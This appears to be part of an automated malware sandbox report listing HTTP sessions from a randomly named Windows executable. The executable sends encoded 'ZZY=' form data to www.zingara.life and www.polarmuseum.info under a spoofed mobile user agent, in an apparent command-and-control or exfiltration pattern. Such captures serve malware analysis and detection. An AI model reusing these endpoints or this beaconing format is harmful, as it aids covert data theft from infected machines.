                                                                                                                Data Ascii: ZZY=vYwezIkxYKhPutH0oJehSs6zd/xPcIJP8hARbbRtyDIoKBnK7t61zQfgY8D0Ir8YGNijKo5AvCn1ITsfUYh6OS8u870yAbwJBlprCnvRzTDQM0ya7r8lodhGE9kyWoXWwncSgRjfmxePUBw/jisqRCfel0JrRxnJs62IclWj1SWJ7ab0pWRY/3QhHhP+iW1qDRR9kIsK+fzDWPeaBbEepzL5/3xoP1+QwF/0QGc=
Oct 9, 2024 14:07:54.257119894 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:07:54 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                x-frame-options: DENY
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                content-language: en-IN
                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Lax
                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:53 GMT; SameSite=Lax
                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:54 GMT; SameSite=Lax
                                                                                                                set-cookie: _shopify_y=f1994b7a-4418-4777-9882-f971f0cbd2e4; Expires=Thu, 09-Oct-25 12:07:54 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                set-cookie: _shopify_s=8e62383f-c62d-45d6-a9c4-12d0e528e322; Expires=Wed, 09-Oct-24
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
Oct 9, 2024 14:07:54.257144928 CEST | 1236 | IN | Data Raw: 31 32 3a 33 37 3a 35 34 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 69 6e 67 61 72 61 2e 6c 69 66 65 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 65 34 31 37 66 34 35 37 2d 66 65
                                                                                                                Data Ascii: 12:37:54 GMT; Domain=zingara.life; Path=/; SameSite=Laxx-request-id: e417f457-fe2c-4d81-add5-90ac10630a20-1728475673server-timing: processing;dur=178content-security-policy: frame-ancestors 'none'; report-uri /csp-report?source%5Baction%
Oct 9, 2024 14:07:54.257155895 CEST | 1236 | IN | Data Raw: 74 44 75 72 61 74 69 6f 6e 3b 64 75 72 3d 33 39 34 2e 30 30 30 30 35 33 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 66 65 34 30 63 31 30 63 38 63 34 32 65 38 2d 45 57 52 0d 0a 0d 0a 36 37 39 0d
                                                                                                                Data Ascii: tDuration;dur=394.000053Server: cloudflareCF-RAY: 8cfe40c10c8c42e8-EWR679X[o6~Th)[*kvv:`hFv}(Kr~Q%w\}4CGPR^<B(QIPQQrr-.$5Hs85dGW**x#irzP
Oct 9, 2024 14:07:54.257168055 CEST | 511 | IN | Data Raw: b3 7d 7e 4f f3 15 b9 a5 e2 6b 6a 63 1c 0d 5a 93 24 f9 aa d2 93 5a 22 1a 08 c6 03 9e 9c dc 48 d3 41 de 5d 30 3f 54 a4 a5 c6 b0 bb 41 b4 e1 cc 5b 22 2b 04 e1 7c 1b a5 fe 6c 89 dd d0 4f 96 31 ba 8c 16 7e 1c a5 ae 17 fa b3 c5 12 01 50 69 ba b0 bb 18
                                                                                                                Data Ascii: }~OkjcZ$Z"HA]0?TA["+|lO1~Pih.;/|ty@p7\!}lVWpuvxYc`]Mqt"~8N/_c"JTn<P8|$p=]>6BblS?VfAs r


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.7 | 49999 | 23.227.38.74 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:55.908375978 CEST | 1707 | OUT | POST /s7qk/ HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.zingara.life
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.zingara.life/s7qk/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 76 59 77 65 7a 49 6b 78 59 4b 68 50 75 74 48 30 6f 4a 65 68 53 73 36 7a 64 2f 78 50 63 49 4a 50 38 68 41 52 62 62 52 74 79 44 41 6f 4b 7a 76 4b 70 2b 53 31 79 51 66 67 51 63 43 7a 49 72 38 46 47 4e 71 6e 4b 6f 31 51 76 41 76 31 4a 77 6b 66 63 4e 4e 36 48 53 38 75 6a 4c 30 7a 66 4c 77 59 42 6c 34 73 43 6e 66 52 7a 54 44 51 4d 32 71 61 2f 2b 63 6c 6b 39 68 42 54 4e 6b 32 63 49 57 4c 77 6e 45 6f 67 52 33 6c 6d 43 57 50 55 68 67 2f 68 77 30 71 5a 43 66 63 6b 30 49 75 52 77 61 4c 73 36 43 4d 63 6c 69 46 31 56 36 4a 2b 64 69 67 38 31 56 4f 72 68 41 46 59 69 65 66 69 32 39 32 42 69 6c 39 69 36 38 77 77 2f 62 42 5a 4d 53 42 55 50 6c 35 38 43 62 37 31 7a 4a 75 66 54 62 4d 72 48 69 75 4d 43 66 2b 48 71 5a 46 7a 54 32 76 79 78 49 67 6e 53 6e 6b 30 6a 74 49 6c 50 32 78 6c 62 46 56 34 36 54 72 32 68 6d 61 41 34 36 43 49 50 77 49 4c 6b 4d 33 75 71 75 65 4c 63 75 30 70 4e 6f 6c 6b 76 6e 56 35 5a 53 54 53 70 44 74 61 62 6e 38 32 5a 72 6c 52 46 52 6e 64 6b 75 32 6b 76 30 6f 52 53 68 54 70 43 36 61 6e 68 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=vYwezIkxYKhPutH0oJehSs6zd/xPcIJP8hARbbRtyDAoKzvKp+S1yQfgQcCzIr8FGNqnKo1QvAv1JwkfcNN6HS8ujL0zfLwYBl4sCnfRzTDQM2qa/+clk9hBTNk2cIWLwnEogR3lmCWPUhg/hw0qZCfck0IuRwaLs6CMcliF1V6J+dig81VOrhAFYiefi292Bil9i68ww/bBZMSBUPl58Cb71zJufTbMrHiuMCf+HqZFzT2vyxIgnSnk0jtIlP2xlbFV46Tr2hmaA46CIPwILkM3uqueLcu0pNolkvnV5ZSTSpDtabn82ZrlRFRndku2kv0oRShTpC6anh81tPpJQ8fgQOQ+cU7JcbX9FqvP3cLuPTjqRZ75ESlLSIlopdfJ4ksyCdPv8GzujX2jUM7zMM9V217y++jLrA/xHeRvvJGUq4jN4SQKGe+ywAhmyjRVRWTDR5rlXr+4F8hmljCrlpwi9WM1+K9pUdXno1wncFQchsrqRAOW5ueaxOCMnziputfUCc/Ee2IM2kfVcLlMUGKmJ+PVHv7LMOlNSy8ouIiGv+PHRxK5NSDsYI0tFE8Ga8JZbaafpnID3DfTtUQTq1oCR5Y7/M6SFYu7QWnfJxWzgYyi7pVOWaIkirXteUMR37UssziULMGdK5IXNRB5a6PrWsM+EvyLqE/yKjeHAFY1/1Ss61PQVe52eeSOaBYMJFapTzkUagRH9ObwHHWPia4tgy0yZcpKLB2/yaXU4G1N6LKZh4mR6krIU6akmgHRpyWg7Zq2NAnBnk0iVwr4s0Jx5cUrbHBc27ZW5cnNTcMgFy1hILo20/a6JsEFqqjV53CHbaE7k8cN2Du22spfTmdrLNgSMLy9cIZgzO1DUp50WWs4ke3Wfea/4DEGr05hRShg8j2XYxIhubjhvuh0W2WCr7rhtm+J7/stxxWTGU99WiKFBP0HSrm5VjTCGRRXlP0g99PtNdBIdCR7zNPS7JxLGYdly7VVZbecGMEi/zTNA6YO [TRUNCATED]
Oct 9, 2024 14:07:56.496354103 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                                                Date: Wed, 09 Oct 2024 12:07:56 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                vary: Accept-Encoding,Accept
                                                                                                                x-frame-options: DENY
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                content-language: en-IN
                                                                                                                x-shopify-nginx-no-cookies: 0
                                                                                                                set-cookie: _tracking_consent=%7B%22con%22%3A%7B%22CMP%22%3A%7B%22a%22%3A%22%22%2C%22m%22%3A%22%22%2C%22p%22%3A%22%22%2C%22s%22%3A%22%22%7D%7D%2C%22v%22%3A%222.1%22%2C%22region%22%3A%22USNY%22%2C%22reg%22%3A%22%22%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Lax
                                                                                                                set-cookie: _cmp_a=%7B%22purposes%22%3A%7B%22a%22%3Atrue%2C%22p%22%3Atrue%2C%22m%22%3Atrue%2C%22t%22%3Atrue%7D%2C%22display_banner%22%3Afalse%2C%22sale_of_data_region%22%3Afalse%7D; domain=zingara.life; path=/; expires=Thu, 10 Oct 2024 12:07:56 GMT; SameSite=Lax
                                                                                                                set-cookie: localization=IN; path=/; expires=Thu, 09 Oct 2025 12:07:56 GMT; SameSite=Lax
                                                                                                                set-cookie: _shopify_y=8a594a9b-e5d6-46f6-b3bc-dacfbc7bea45; Expires=Thu, 09-Oct-25 12:07:56 GMT; Domain=zingara.life; Path=/; SameSite=Lax
                                                                                                                set-cookie: _shopify_s=022fb35b-4924-43c4-88bf-911b01658e63; Expires=Wed, 09-Oct-24
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
Oct 9, 2024 14:07:56.496368885 CEST | 224 | IN | Data Raw: 31 32 3a 33 37 3a 35 36 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 69 6e 67 61 72 61 2e 6c 69 66 65 3b 20 50 61 74 68 3d 2f 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 78 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 34 65 63 31 38 66 33 66 2d 63 39
                                                                                                                Data Ascii: 12:37:56 GMT; Domain=zingara.life; Path=/; SameSite=Laxx-request-id: 4ec18f3f-c937-4051-bac3-b32bb25861a0-1728475676server-timing: processing;dur=93content-security-policy: frame-ancestors 'none'; report-uri /csp-repor
Oct 9, 2024 14:07:56.496901035 CEST | 1236 | IN | Data Raw: 74 3f 73 6f 75 72 63 65 25 35 42 61 63 74 69 6f 6e 25 35 44 3d 6e 6f 74 5f 66 6f 75 6e 64 26 73 6f 75 72 63 65 25 35 42 61 70 70 25 35 44 3d 53 68 6f 70 69 66 79 26 73 6f 75 72 63 65 25 35 42 63 6f 6e 74 72 6f 6c 6c 65 72 25 35 44 3d 73 74 6f 72
                                                                                                                Data Ascii: t?source%5Baction%5D=not_found&source%5Bapp%5D=Shopify&source%5Bcontroller%5D=storefront_section%2Fshop&source%5Bsection%5D=storefront&source%5Buuid%5D=4ec18f3f-c937-4051-bac3-b32bb25861a0-1728475676x-content-type-options: nosniffx-downloa
Oct 9, 2024 14:07:56.496913910 CEST | 1236 | IN | Data Raw: 0e 2a 78 23 69 03 72 1a 7a 50 fb 40 4b ea e4 6d 4d 91 bc 6d 81 56 d2 1b 19 14 5d 07 3a 40 0a 42 3f a1 cf 68 cd 45 49 45 16 3e 43 3b 22 b6 ac 51 ab 96 94 25 6b b6 6a e9 ed f8 27 6f cd 6f bc 8e 7d 52 47 86 5c 9d c0 dd 91 ae af 99 7c e8 fa 01 ae 2f
                                                                                                                Data Ascii: *x#irzP@KmMmV]:@B?hEIE>C;"Q%kj'oo}RG\|/Z]L(V2ggNzcmJ SE^Fjuy4(!8&V(pPzv&i~fkPK5y~8.I,UV(U<Rmt#OaA!
Oct 9, 2024 14:07:56.496925116 CEST | 278 | IN | Data Raw: 0c 73 20 d5 72 f4 e2 d2 8a d7 bb 5e b1 61 b0 56 18 24 de a8 fa 02 2f 4d cd 59 14 fe b7 73 ca 70 8c ae e0 63 31 41 76 00 72 e5 58 99 5f 45 b6 20 ad 05 d6 d2 7d 17 e0 79 b0 3d 17 89 b3 c7 67 0e ef 1d c1 e3 72 98 48 cc 03 36 56 90 b7 b6 75 0f 8f a9
                                                                                                                Data Ascii: s r^aV$/MYspc1AvrX_E }y=grH6VujfTq.>pZA)"n>9xdvya*|tVtsB@oCZ3T=EanM+H~C%m>]U||$2X'Um*A#YQz`|~m4c


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.7 | 50000 | 23.227.38.74 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:07:58.448271036 CEST | 415 | OUT | GET /s7qk/?ZZY=iaY+w4IpIrYSidyoirH4HJSkbusQX4NI5gNJJ4lc6xQkeif0pMuzzCPjcczGW/AsONaxEKF5w0HAACs6c94+MzxqwLAwe70WCnJ+QkbRlWeyUQ/E8YwpuoNtXuk6ep3axG9muxvIvCTd&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.zingara.life
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:07:58.956057072 CEST | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                                                                Date: Wed, 09 Oct 2024 12:07:58 GMT
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                x-sorting-hat-podid: 156
                                                                                                                x-sorting-hat-shopid: 68129128605
                                                                                                                x-storefront-renderer-rendered: 1
                                                                                                                location: https://zingara.life/s7qk?ZZY=iaY+w4IpIrYSidyoirH4HJSkbusQX4NI5gNJJ4lc6xQkeif0pMuzzCPjcczGW/AsONaxEKF5w0HAACs6c94+MzxqwLAwe70WCnJ+QkbRlWeyUQ/E8YwpuoNtXuk6ep3axG9muxvIvCTd&mHm0o=rrqhoH
                                                                                                                x-redirect-reason: https_required
                                                                                                                x-frame-options: DENY
                                                                                                                content-security-policy: frame-ancestors 'none';
                                                                                                                x-shopid: 68129128605
                                                                                                                x-shardid: 156
                                                                                                                vary: Accept
                                                                                                                powered-by: Shopify
                                                                                                                server-timing: processing;dur=14, db;dur=4, asn;desc="3356", edge;desc="EWR", country;desc="US", pageType;desc="404", servedBy;desc="xt5b", requestID;desc="946ff833-0065-4ef3-b0b4-521e662fc7a4-1728475678"
                                                                                                                x-dc: gcp-us-east1,gcp-us-east1,gcp-us-east1
                                                                                                                x-request-id: 946ff833-0065-4ef3-b0b4-521e662fc7a4-1728475678
                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a0CLDKfmr7owkWkUzClp2GRwMbnlDrC3R08nezv2g8RcKzp82hF0ivLAJaXcF2RuQk6DLGT3zHxNVCWRlJX2q6yiVrJ4aEzcHTE71Te615BIalhdy%2BFFiCb%2B8E3JQuFef%2Fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_f
                                                                                                                Data Raw:
                                                                                                                Data Ascii:
Oct 9, 2024 14:07:58.956235886 CEST | 288 | IN | Data Raw: 61 63 74 69 6f 6e 22 3a 30 2e 30 31 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 2d 54 69 6d 69 6e 67 3a 20 63 66 52 65 71 75 65 73 74 44 75 72 61 74
                                                                                                                Data Ascii: action":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=63.000202X-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-Download-Options: noopenServer:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.7 | 50001 | 199.59.243.227 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:04.100651979 CEST | 686 | OUT | POST /reui/ HTTP/1.1
                                                                                                                Host: www.polarmuseum.info
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.polarmuseum.info
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.polarmuseum.info/reui/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 78 34 2b 31 43 59 36 6f 4d 33 30 55 57 32 47 69 2f 30 46 78 45 33 74 4f 62 79 41 65 50 50 61 62 4d 58 34 68 32 78 74 7a 6c 33 4e 5a 6d 35 67 70 34 70 4e 4f 6e 58 76 65 48 4c 49 61 52 59 39 78 48 37 57 63 53 35 36 33 6c 55 73 69 73 64 65 68 6a 76 72 38 77 51 48 4a 6e 76 35 70 68 5a 45 4a 5a 4c 33 31 42 65 69 66 30 4e 51 38 6f 49 79 42 54 59 4f 30 48 55 4d 4a 6e 75 48 46 79 69 6e 59 35 64 6b 57 44 44 64 36 53 4f 61 59 62 41 65 63 61 58 46 78 2b 5a 4a 66 43 4c 70 48 6a 37 2b 54 4b 46 45 61 4b 55 46 7a 4b 2b 50 6c 57 63 48 5a 69 66 71 45 68 49 32 69 30 37 59 4e 69 33 54 6a 6e 59 4a 33 59 63 74 33 6a 69 71 58 73 42 36 62 72 41 3d 3d
                                                                                                                Data Ascii: ZZY=x4+1CY6oM30UW2Gi/0FxE3tObyAePPabMX4h2xtzl3NZm5gp4pNOnXveHLIaRY9xH7WcS563lUsisdehjvr8wQHJnv5phZEJZL31Beif0NQ8oIyBTYO0HUMJnuHFyinY5dkWDDd6SOaYbAecaXFx+ZJfCLpHj7+TKFEaKUFzK+PlWcHZifqEhI2i07YNi3TjnYJ3Yct3jiqXsB6brA==
Oct 9, 2024 14:08:04.533595085 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                date: Wed, 09 Oct 2024 12:08:03 GMT
                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                content-length: 1130
                                                                                                                x-request-id: 6f9baea8-3bcd-4940-803d-dbb825dc1b33
                                                                                                                cache-control: no-store, max-age=0
                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==
                                                                                                                set-cookie: parking_session=6f9baea8-3bcd-4940-803d-dbb825dc1b33; expires=Wed, 09 Oct 2024 12:23:04 GMT; path=/
                                                                                                                connection: close
                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 71 38 78 51 4d 41 51 59 76 4e 50 75 51 4d 69 77 50 30 55 51 31 58 4a 65 46 61 66 4a 75 5a 79 42 2f 2b 68 6d 37 57 70 35 41 74 5a 65 7a 58 2b 36 70 77 7a 50 6f 79 30 77 51 71 63 43 68 4d 39 6f 67 64 61 4c 43 48 62 74 78 4b 56 75 41 6a 62 74 47 41 47 47 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Oct 9, 2024 14:08:04.533689976 CEST | 583 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                                                                Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmY5YmFlYTgtM2JjZC00OTQwLTgwM2QtZGJiODI1ZGMxYjMzIiwicGFnZV90aW1lIjoxNzI4NDc1Nj


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                30192.168.2.750002199.59.243.227801104C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:08:06.653103113 CEST | 706 | OUT | POST /reui/ HTTP/1.1
                                                                                                                Host: www.polarmuseum.info
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.polarmuseum.info
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.polarmuseum.info/reui/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 78 34 2b 31 43 59 36 6f 4d 33 30 55 57 54 4f 69 7a 33 39 78 42 58 74 4e 65 79 41 65 47 76 61 6c 4d 58 30 68 32 77 35 6a 6b 46 70 5a 6d 59 77 70 35 6f 4e 4f 67 58 76 65 66 62 49 54 65 34 39 45 48 37 61 75 53 38 43 33 6c 51 38 69 73 66 47 68 6a 63 7a 2f 68 51 48 4c 2b 2f 35 6e 38 70 45 4a 5a 4c 33 31 42 65 6d 78 30 4a 38 38 6f 37 36 42 54 38 53 72 4f 30 4d 47 33 4f 48 46 6a 53 6e 63 35 64 6c 46 44 42 6f 6e 53 4d 53 59 62 43 32 63 61 6c 74 77 30 5a 4a 6a 4e 72 6f 33 6e 4a 72 32 4b 56 55 30 45 57 41 6d 46 4a 65 66 54 71 61 37 34 39 6d 6f 2f 5a 4f 5a 77 35 38 37 31 52 4f 57 6c 5a 4e 76 56 2b 5a 57 38 56 50 39 68 54 62 66 39 2b 71 30 46 6a 49 30 6e 79 75 46 69 6a 55 69 66 55 42 66 55 48 34 3d
                                                                                                                Data Ascii: ZZY=x4+1CY6oM30UWTOiz39xBXtNeyAeGvalMX0h2w5jkFpZmYwp5oNOgXvefbITe49EH7auS8C3lQ8isfGhjcz/hQHL+/5n8pEJZL31Bemx0J88o76BT8SrO0MG3OHFjSnc5dlFDBonSMSYbC2caltw0ZJjNro3nJr2KVU0EWAmFJefTqa749mo/ZOZw5871ROWlZNvV+ZW8VP9hTbf9+q0FjI0nyuFijUifUBfUH4=
Oct 9, 2024 14:08:07.116070986 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                date: Wed, 09 Oct 2024 12:08:06 GMT
                                                                                                                content-type: text/html; charset=utf-8
                                                                                                                content-length: 1130
                                                                                                                x-request-id: 4de63ab0-f2a8-44a1-b860-9d61f0fbd9ea
                                                                                                                cache-control: no-store, max-age=0
                                                                                                                accept-ch: sec-ch-prefers-color-scheme
                                                                                                                critical-ch: sec-ch-prefers-color-scheme
                                                                                                                vary: sec-ch-prefers-color-scheme
                                                                                                                x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_tq8xQMAQYvNPuQMiwP0UQ1XJeFafJuZyB/+hm7Wp5AtZezX+6pwzPoy0wQqcChM9ogdaLCHbtxKVuAjbtGAGGA==
                                                                                                                set-cookie: parking_session=4de63ab0-f2a8-44a1-b860-9d61f0fbd9ea; expires=Wed, 09 Oct 2024 12:23:07 GMT; path=/
                                                                                                                connection: close
                                                                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 74 71 38 78 51 4d 41 51 59 76 4e 50 75 51 4d 69 77 50 30 55 51 31 58 4a 65 46 61 66 4a 75 5a 79 42 2f 2b 68 6d 37 57 70 35 41 74 5a 65 7a 58 2b 36 70 77 7a 50 6f 79 30 77 51 71 63 43 68 4d 39 6f 67 64 61 4c 43 48 62 74 78 4b 56 75 41 6a 62 74 47 41 47 47 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
